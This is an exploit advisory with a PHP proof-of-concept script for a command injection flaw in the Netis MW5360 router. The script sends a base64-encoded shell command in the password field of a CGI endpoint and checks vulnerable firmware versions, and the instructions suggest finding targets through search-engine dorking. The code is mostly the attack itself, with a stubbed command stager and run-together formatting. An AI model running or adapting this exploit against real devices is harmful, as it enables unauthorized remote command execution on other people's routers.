Headline
Netis MW5360 Code Injection
Netis MW5360 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Netis MW5360 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.netis-systems.com/products/MW5360.html |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 67 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass NetisRouterExploit { private $targetUri; private $cmdDelay; public function __construct($targetUri = '/', $cmdDelay = 30) { $this->targetUri = $targetUri; $this->cmdDelay = $cmdDelay; } public function executeCommand($cmd) { // Clean up payload file if command includes chmod if (strpos($cmd, 'chmod +x') !== false) { $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1])); } // Skip command removal for payload cleanup if (strpos($cmd, 'rm -f') === false) { $payload = base64_encode("`$cmd`"); echo "Executing $cmd\n"; $this->sendRequest('/cgi-bin/skk_set.cgi', [ 'password' => $payload, 'quick_set' => 'ap', 'app' => 'wan_set_shortcut' ]); } } public function check() { echo "Checking if target can be exploited.\n"; $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [ 'mode_name' => 'skk_get', 'wl_link' => 0 ]); if ($res === false || strpos($res['body'], 'version') === false) { return "Unknown: No valid response received from target."; } preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches); if (isset($matches[2])) { $version_number = strtoupper(trim(explode('-V', $matches[2])[1])); $model_number = strtoupper(trim(explode('-V', $matches[2])[0])); if (strpos($model_number, '-') !== false) { $model_number = trim(explode('-', $model_number)[1]); } else { $model_number = trim(explode('(', $model_number)[1]); } if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) { return "Appears: Version " . $matches[2]; } return "Safe: Version " . $matches[2]; } return "Safe"; } public function exploit() { echo "Executing exploit with payload.\n"; $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]); } private function sendRequest($uri, $postData) { $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($postData), ], ]; $context = stream_context_create($options); $result = file_get_contents($url, false, $context); if ($result === FALSE) { return false; } return ['body' => $result]; } private function registerFilesForCleanup($filename) { echo "Registering $filename for cleanup.\n"; // Logic to clean up the file after execution. } private function executeCmdStager($options) { echo "Executing command stager with options: " . print_r($options, true) . "\n"; // Implement the command stager logic here }}// Usage$exploit = new NetisRouterExploit('/');$exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================